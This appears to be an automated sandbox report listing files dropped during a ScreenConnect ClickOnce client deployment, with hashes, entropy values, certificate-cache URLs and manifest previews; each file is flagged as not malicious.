                                                                                                                                                                                                                                        Preview:p...... ............U..(................................................T..S.. ........~..MG......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".0.6.c.f.c.c.5.4.d.4.7.d.b.1.:.0."...
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):328
                                                                                                                                                                                                                                        Entropy (8bit):3.150184159866505
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:kKIi9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:AdDnLNkPlE99SNxAhUe/3
                                                                                                                                                                                                                                        MD5:F9A8739C1637B182D7A77C1A2FFDE61C
                                                                                                                                                                                                                                        SHA1:F2847FF3AE718001E9197920FA901BED3674B472
                                                                                                                                                                                                                                        SHA-256:2CA6FF0A88AAAB5AD9364F94456A7AAE02476E8848045763D4966412F6E8B70F
                                                                                                                                                                                                                                        SHA-512:BCFCC1833380A7AB5F8F1F48D0B3A46C83FFCFAC8554ABEFF7C89A0B091768A0F7BFB73CADFC769E81F64EB83A2653025BAB3746B11F8DF5C0FEE42254421411
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:p...... .........$.S..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):308
                                                                                                                                                                                                                                        Entropy (8bit):3.2115528011502117
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:kKiaNdzNcalgRAOAUSW0P3PeXJUwh8lmi3Y:qaCtWOxSW0P3PeXJUZY
                                                                                                                                                                                                                                        MD5:CEA72D14567207AC925E41770A2F2950
                                                                                                                                                                                                                                        SHA1:CFEC3AC799718F4598F31C1A41BE7154EECDD0C1
                                                                                                                                                                                                                                        SHA-256:EBC776D7233EDD62655FF4C9CB3BD5B06666F64090933542177A1FBD8BEED23F
                                                                                                                                                                                                                                        SHA-512:A8C4A3ABE4854F89BA96A441B79A184AEE7C953211D3672D788E12C9D908F4F42E50FBFE9878106643D450B3ED1F34CFC2061B9928F4130CFAF3337F34A490C4
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:p...... ............S..(....................................................... ........}.-@@......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.t...".6.0.9.0.3.0.2.2.-.6.b.4."...
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):412
                                                                                                                                                                                                                                        Entropy (8bit):3.9736165971053605
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:UOZ2ZUUmxMiv8sFBSfamB3rbFURMOlAkr:xEZUUmxxv7Sf13rbQJr
                                                                                                                                                                                                                                        MD5:2FECA7278805DE58366D3D08AF4D8FA5
                                                                                                                                                                                                                                        SHA1:977B92F27461ED707F79C3AE80A35D25B9626AF1
                                                                                                                                                                                                                                        SHA-256:C899E3994D135AA00F79E2B9C1899B758C76E854ECB2CE2E921B2E3B1B61C4EE
                                                                                                                                                                                                                                        SHA-512:D5D475F385DBC21A76E34DC1BB3683D98AD867A5F8A4F4B3D30440DA4ABA279B3C1AD69087FBE4726A99DE862EF166F1A08EA1C24D5B914148128A1FB0537708
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:p...... ....(.......S..(.................%.ER...]...W...................]...W.. .........x.R.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):254
                                                                                                                                                                                                                                        Entropy (8bit):3.0185545231720012
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:kKia5LDcJgjcalgRAOAUSW0PTKDXMOXISKlUp:V5LYS4tWOxSW0PAMsZp
                                                                                                                                                                                                                                        MD5:1FE8958CE1F8C4C07D5D57D30BC4E5FA
                                                                                                                                                                                                                                        SHA1:6C9A455F5E8AB229E0E790C0A446D00FCDA11D03
                                                                                                                                                                                                                                        SHA-256:ACD961F5811FB6C5BF4690D498C2E038B832882F74E01E5A8004B9F867290FE1
                                                                                                                                                                                                                                        SHA-512:7B73A2FC84A1E803738B705B42002C27C8B4D5377FF0151B70688A96922192287FE0E58295959090C4A8EBF14738BA8B6301C511CF9918C9068A319C5E3CBA9B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:p...... ....l....PF.mS..(....................................................... ............n......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.t...".5.a.2.8.6.4.1.7.-.5.9.4."...
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):25496
                                                                                                                                                                                                                                        Entropy (8bit):5.591150282427365
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:CGqwEEtGQ6ARE1X9iv2buX9R/QPIBM7Yw9umpGg1UOi:CzC6P1X9HuX9R/QPI+0Agg1UOi
                                                                                                                                                                                                                                        MD5:AD2BD7E321F9600398138B98AFA04651
                                                                                                                                                                                                                                        SHA1:8A0FE7D3C6D2F53621CDA1264124A9EAFBDE26B9
                                                                                                                                                                                                                                        SHA-256:05707B4B61A6BA4656D204B51FA5EBC8A66BD9D2CE89BD8D3775A19F0FCFAA1E
                                                                                                                                                                                                                                        SHA-512:EC99AF9067035FB2C49B22591E8878887CEC4556CA4A59099691A7DE10E3C06F70627258B9D41209B8839BAF7D67EE794DE8A1C52469AB3F248D6BB0E65C144A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10073), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):17858
                                                                                                                                                                                                                                        Entropy (8bit):5.955723401117127
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:zeNAJBQ4aCaX/f68nEuX9/v2bTX9FX9R/QPIYM7Y7:z66buX9uTX9FX9R/QPIN07
                                                                                                                                                                                                                                        MD5:4739CCEA24F7615F4B5186F8DB9AA006
                                                                                                                                                                                                                                        SHA1:66161FDE108CD3C27770559B5408F08F0EFA0C64
                                                                                                                                                                                                                                        SHA-256:4C5AFFF7D1CED73D787E691D8F1E82D26E4BFF70E2D9001EF220D66C3BC2D041
                                                                                                                                                                                                                                        SHA-512:0EE5B62138BAFDF5252F304963C4F9F3A6D56E3F3C1C2CF209B284FFE5B3F4424BD09DC42F6EE79307258DE74BA0C326C81D0958402CA979602B95409D707900
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.4.2.9083" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.4.2.9083" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" parameter
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3452
                                                                                                                                                                                                                                        Entropy (8bit):4.6805444379821415
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:c5WWW1eV+WwQXAmLw2HDuhzPOZCywZ5t3xhIYX:cPJD02HyFPOyZXf
                                                                                                                                                                                                                                        MD5:63B8E645DE07F536F45E682F163B016A
                                                                                                                                                                                                                                        SHA1:677ADB3BBA898DCEFFFDD911B0BD01B13C978882
                                                                                                                                                                                                                                        SHA-256:7D4CBBB0175517EB0C8B653C4C47A8F13AFC3899939D69D29F934859CA1E0543
                                                                                                                                                                                                                                        SHA-512:70BF47F5BAD04A6065ACF10677C55A57B64754A4948B05DD80A86EDF5E116C0EAE9D274EB0B63AF83C178829E83D5CF0D2A397DFFDD087A45B353779CA9356B7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1215
                                                                                                                                                                                                                                        Entropy (8bit):5.130383203139021
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onR+geP0A5vSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0A/GVETDTo
                                                                                                                                                                                                                                        MD5:AE2F030FA7A72B3B147D9699F326D545
                                                                                                                                                                                                                                        SHA1:A918B54C0AD8216B1E61D2C0BA35239B6BB5CB74
                                                                                                                                                                                                                                        SHA-256:0884F127D1A5260AC40B7CACEA51F9A994B4E3BEAB6E5C75E848CA3000FEADF9
                                                                                                                                                                                                                                        SHA-512:06857692C0283FA76512060E56D711E87B789A305B3720B0255AF920004DBFAC6C782FCD12E85771A918A2FFEDC55A3723F9D616D2A21F3042E158AC25889504
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.4.2.9083" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssemb
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):5256
                                                                                                                                                                                                                                        Entropy (8bit):4.020399196134929
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:rdP+Rxl+heV+Ww7xkIeo2n4XOmBWzvngnsRA:4RxlnJdIO8OcWQZ
                                                                                                                                                                                                                                        MD5:3B1013E089AA9BFA6C3112C25197B394
                                                                                                                                                                                                                                        SHA1:2C9A3D8AA26AC8699E18C0EBBB4FCE6DA0719FD3
                                                                                                                                                                                                                                        SHA-256:6CB2A3034D0FC66F1F468AF2D02977A0FCEDC4111491374C1ADA4AF8362C5DAA
                                                                                                                                                                                                                                        SHA-512:1C785435376D05DD086724C8EB496F45E438DAED737FA20E321D396E64089BAF6FF4AEB628B10FBAFBEF87F7CD2068DE439E9F7D14F0563FBEE258FF716FFA76
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1980
                                                                                                                                                                                                                                        Entropy (8bit):5.057000083875677
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onRbggeP0A1vSkcyMDcVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AzHMDGQAXRTFgTo
                                                                                                                                                                                                                                        MD5:979E83C183434FDF0840E13A1BEB2200
                                                                                                                                                                                                                                        SHA1:5EF4A368EA8FF239AEACEFDD109F799F6EA58567
                                                                                                                                                                                                                                        SHA-256:50FE4C046184A3BE4A888C14564F56816BDD47AD3B7C580E0EF8B9FAF1101813
                                                                                                                                                                                                                                        SHA-512:316F0A82D8BE824D8146A69CCE201F5E4D959DB9C56EF85CA5D7BBDF79E19116F8C179CDC2B59ECEDE03B29B6E4EF695A0C792EE207E24295F7C87D1B5FD0428
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.4.2.9083" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.4.2.9083" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):6584
                                                                                                                                                                                                                                        Entropy (8bit):3.9003708076808596
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:5vm9PPb/RPpeV+Www98WpJOJJQH2hM+OREQ/Oo3jn6qx/VT:CPPLRuJdpJYl8b9T6aT
                                                                                                                                                                                                                                        MD5:DC6821DAA725AE1B3CFE11A4F4C0246E
                                                                                                                                                                                                                                        SHA1:3A76CCE70DAEC40272B6A42B9077BEF0F64B5737
                                                                                                                                                                                                                                        SHA-256:09379EADA48242321C3CC27892DF38217BE1FA1D4CCC63726D8B21B37CCFBC36
                                                                                                                                                                                                                                        SHA-512:8922EF9D29C0CD1821C4F560E27D56380CED2CCC0395C19CE4EB9AE28781CAAAB4A225AA634EF035EC5C4BEE27D7A4E3661622F5F5B1B1E74BE5EDF1427666D7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2569
                                                                                                                                                                                                                                        Entropy (8bit):5.025603000423177
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:3FYZ8h9o5gI0AEHMDAXQ3MDTMDRGTDBTo:1YiW4ALsvcx
                                                                                                                                                                                                                                        MD5:F8EE5554BAB7AE67A2373703243F634E
                                                                                                                                                                                                                                        SHA1:D30490278145AB14366D55959945E7DB1A444FFA
                                                                                                                                                                                                                                        SHA-256:33578584A89CC841B992603039410B1B93907CBFDF0FA6BD0C6E12680A804C02
                                                                                                                                                                                                                                        SHA-512:552087971AD984B4FC36F69E68F46977C0E31E6DD7DF249332D2783F807254DF46C8F8BF7F7F18A48F606CF5C09026620770DF63DC91A636F842F950C22EA174
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.4.2.9083" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.4.2.9083" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3032
                                                                                                                                                                                                                                        Entropy (8bit):4.5394001017913626
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:mnNQ/cwgIe6S+9oww7gp7Tk2CVjz15JeQ7nwbq:om/cUeV+WwwmTk91jeQ7nEq
                                                                                                                                                                                                                                        MD5:4BD661401AA82ABAED08C151CA341141
                                                                                                                                                                                                                                        SHA1:797EC66B986F885898EBA88C9DB2E1D1D7C32699
                                                                                                                                                                                                                                        SHA-256:57FB1DC197D4953D2890D660EFAEB0F3014F23D87858389BAF475F08720FC8CF
                                                                                                                                                                                                                                        SHA-512:0388A2B5BA8132A64F1DF9EB5F27B07B9AED4D97B32E14F5F9B20D979DE75440F3CC267B5B59575BEBC752A4BEEB375B1C6D4A2243A6940A8CFBEE8C5EAD8377
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1039
                                                                                                                                                                                                                                        Entropy (8bit):5.148447070499623
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:MMHdF4XZ8i9o9olxbv5NEgVkP0AWR7vNxW57FpS+iENg49vNxW5NgMRNg49vNxWO:JdFYZ8h9onRigeP0AJvSkcyMDcVSkTo
                                                                                                                                                                                                                                        MD5:131D3A2329559EDB69DFAE83D4F7FF6F
                                                                                                                                                                                                                                        SHA1:16E303B64B7007C64A5FACC76A3876B3AD8BFC6F
                                                                                                                                                                                                                                        SHA-256:78B036CA84FBE94BC5DCFFA3F8BFB563ABBEC1E645C2053043C288A896EEE760
                                                                                                                                                                                                                                        SHA-512:7D5CAD1324B4B7275967F657648FADA1BA74A15497678F5FAF1430758ACC8B0E442D5E7EB2707AC37785480FED139D270831A54F14EB640F54F633EACC9087DB
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.4.2.9083" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.4.2.9083" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependent
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):14608
                                                                                                                                                                                                                                        Entropy (8bit):5.7101911293072645
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:b/Vs9rEK6Hbc8s8oj0MN8s8oTN2x2QPIlFDLhEDh7BqWojO9:b/69rEK6HwX9VX9R/QPIBM7YjC
                                                                                                                                                                                                                                        MD5:130CE709203E6FD72FE7412F5859856E
                                                                                                                                                                                                                                        SHA1:591B84A9EC3EEDC07CC93CE28C892111002F1B54
                                                                                                                                                                                                                                        SHA-256:21B7EF1573933C4CC6E88DBB1ADEA80D1E8B0C5C2BF8AFD52AB9DB2D0547722B
                                                                                                                                                                                                                                        SHA-512:6FB66AA56843002A26F6B657D6BE6AFA7F3506AF74E4C155CDE9BF4D1BA1B5F15E4B6E3C5A80BF8AB1AC95E71501E3FC2B14822A07DE0670EC90CFB6E0A3509F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63849), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):118570
                                                                                                                                                                                                                                        Entropy (8bit):5.58802022381172
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:Q0/CcT51/FXvMVNWfCXq9ymKQm2o9HuzhJOvP:ZCcfiVIEQmt8vOvP
                                                                                                                                                                                                                                        MD5:F450107E1E082AB0A9F72C187D9CD440
                                                                                                                                                                                                                                        SHA1:DBAE33BCEA9D70C0B32E01D9BD0BFBC5AC3CD087
                                                                                                                                                                                                                                        SHA-256:B1A80158AD4B45F74C4A74F943CFF18F6888DBAE987C4C34717B6EEF9F1CF9B9
                                                                                                                                                                                                                                        SHA-512:4122737EF3F4EF05E7F1FE45DE96BC974CB153C236B9E66B62FFD71088F06D43E9E031994382378102504C0E62A262B335E6A5BF1FC29BEF566CC6233C6DBAE7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.4.2.9083" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tru
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4428
                                                                                                                                                                                                                                        Entropy (8bit):4.429510656357047
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:fsWeV+Ww8945u/Cq6Np+Z9yM+fGnDv3uGf:QJmu/j6p8+aD/J
                                                                                                                                                                                                                                        MD5:399C9154BEF10F41712FC5E7C68222E7
                                                                                                                                                                                                                                        SHA1:EB23B3FA34D5689D4500FEAFBEAF8DDD478C4908
                                                                                                                                                                                                                                        SHA-256:75982EE0C3D16D65FA01EFB1E56C09292D6825B074D972F3AF9C1A78AB02D7DD
                                                                                                                                                                                                                                        SHA-512:EF06220FC63892708044A6B9DC7085FE1D303338FE36D839D2F6FB92E416724093560332AE36F02B78255D5776549FB9B6AADF28C32A5E595098A07D8026ADFC
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1632
                                                                                                                                                                                                                                        Entropy (8bit):5.085064362578612
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onRzgeP0Ah+vSkcyMDcbEMDcuMDcVSkcf5bdTo:3FYZ8h9o9gI0AhCHMDTMD3MDGAXTo
                                                                                                                                                                                                                                        MD5:A76A11959003296D5D51977FCCA1A318
                                                                                                                                                                                                                                        SHA1:80D5EDD082ECC84E1989A425475A21084D3007B3
                                                                                                                                                                                                                                        SHA-256:6728343B086A6BDA1D771D9DAC1C894A4D26F38D3CD4DFCC1BE31D99F6C89494
                                                                                                                                                                                                                                        SHA-512:17738FDD0F29C7C6CB7EB8EF7665623ABB6E17DAB430A7840BA416BA93E7BB7D8ECC256919A57944A9A0CA52954DAFB9CCB4D192A5C1860C491E04789F86A310
                                                                                                                                                                                                                                        Malicious:false
